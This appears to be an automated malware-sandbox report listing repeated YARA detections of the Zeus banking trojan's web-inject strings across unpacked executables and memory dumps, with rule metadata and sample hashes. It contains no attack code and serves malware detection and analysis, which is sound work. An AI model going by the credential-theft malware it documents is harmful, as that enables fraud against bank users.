Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c70000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2cd1c00.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.nPtwtzGyOdAtB.exe.f70000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f340000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.42.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.36.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 13.2.nPtwtzGyOdAtB.exe.2f62000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nPtwtzGyOdAtB.exe.2cd0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 15.2.nPtwtzGyOdAtB.exe.2b52000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 38.2.nPtwtzGyOdAtB.exe.2c02000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29a2000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.52.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.WlCVLbzNph.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.48.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.51.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 32.2.nPtwtzGyOdAtB.exe.26b2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c70000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.4200000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1981123376.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1458207873.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1907200563.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1984832465.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.1935549687.0000000001200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1810656396.0000000004200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000026.00000002.1991709433.0000000002C00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2000637798.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1991348286.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1823534171.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1882456143.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
